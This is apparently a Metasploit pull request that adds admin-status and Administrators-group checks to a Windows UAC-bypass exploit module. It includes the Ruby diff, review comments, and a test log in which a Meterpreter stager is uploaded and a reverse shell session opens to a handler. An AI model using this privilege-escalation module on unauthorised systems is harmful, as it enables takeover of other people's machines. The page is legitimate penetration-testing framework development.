add admin already and admin group checks #1067

Merged
merged 2 commits into from over 1 year ago

2 participants

Rob Fuller sinn3r
Rob Fuller

adds check to see if already in admin mode
as well as checking to see if the user is in the local admins group in order to bypass UAC

sinn3r
Collaborator

Review in progress....

sinn3r
Collaborator

tested:

[*] Started reverse handler on 10.0.1.3:4444 
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (752128 bytes) to 10.0.1.10
[*] Meterpreter session 5 opened (10.0.1.3:4444 -> 10.0.1.10:49181) at 2012-11-16 11:50:02 -0600
sinn3r wchen-r7 merged commit e18acf2 into from November 16, 2012
sinn3r wchen-r7 closed this November 16, 2012
Rob Fuller mubix deleted the branch December 21, 2012
Showing 2 unique commits by 1 author.

Nov 14, 2012
Rob Fuller add admin already and admin group checks 7d41f1f
Rob Fuller remove debugging code e18acf2
30  modules/exploits/windows/local/bypassuac.rb
@@ -50,6 +50,11 @@ def initialize(info={})
50 50
 
51 51
 	def exploit
52 52
 
  53
+		isadmin = session.railgun.shell32.IsUserAnAdmin()
  54
+		if isadmin['return']
  55
+			print_error('Already in elevated state. Exiting...')
  56
+			return
  57
+		end
53 58
 
54 59
 		#
55 60
 		# Verify use against Vista+
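Review bot: `print_error('Already in elevated state. Exiting...')` reports a non-failure as an error; a session that is already elevated simply leaves this module with nothing to do, so `print_status` (or `print_good`) describes the situation more accurately and does not read as a fault in the operator's log. A one-line comment on the `isadmin['return']` line would also help: railgun hands back the BOOL from `IsUserAnAdmin()` inside a hash, which is why the bare `['return']` lookup is needed. Minor: the check runs before the "Verify use against Vista+" block that follows, so the railgun call is made even on a platform the module will then refuse; ordering it after the platform check keeps the early exits consistent.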
@@ -95,6 +100,31 @@ def exploit
95 100
 			return
96 101
 		end
97 102
 
  103
+		# Check if you are an admin
  104
+		print_status('Checking admin status...')
  105
+		whoami = session.sys.process.execute('cmd /c whoami /groups', 
  106
+			nil,
  107
+			{'Hidden' => true, 'Channelized' => true}
  108
+			)
  109
+		cmdout = []
  110
+		isinadmins = []
  111
+		while(cmdoutput = whoami.channel.read)
  112
+			cmdout << cmdoutput
  113
+		end
  114
+		if cmdout.size == 0
  115
+			print_error('Either whoami is not there or failed to execute')
  116
+			print_error('Continuing under assumption you already checked...')
  117
+		else
  118
+			isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)
  119
+			if isinadmins.size > 0
  120
+				print_good('Part of Administrators group! Continuing...')
  121
+			else
  122
+				print_error('Not in admins group, cannot escalate with this module')
  123
+				print_error('Exiting...')
  124
+				return
  125
+			end
  126
+		end
  127
+
98 128
 		#
99 129
 		# Generate payload and random names for upload
100 130
 		#
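Review bot: `isinadmins = cmdout[0].split("\r\n").grep(/S-1-5-32-544/)` inspects only the first chunk read from the channel, yet the `while(cmdoutput = whoami.channel.read)` loop above appends every chunk to `cmdout`; if the `whoami /groups` output arrives across more than one read, the Administrators SID can sit in a later element and the module would wrongly report "Not in admins group". Join the chunks before searching, e.g. `isinadmins = cmdout.join.split("\r\n").grep(/S-1-5-32-544/)`. Smaller points: the `isinadmins = []` initialisation is dead because the variable is assigned before it is read; the `'cmd /c whoami /groups', ` line carries trailing whitespace; and the `print_error('Continuing under assumption you already checked...')` branch lets the run proceed with no group check at all when `whoami` produced no output, so the module description should say the membership check is best-effort rather than a guarantee.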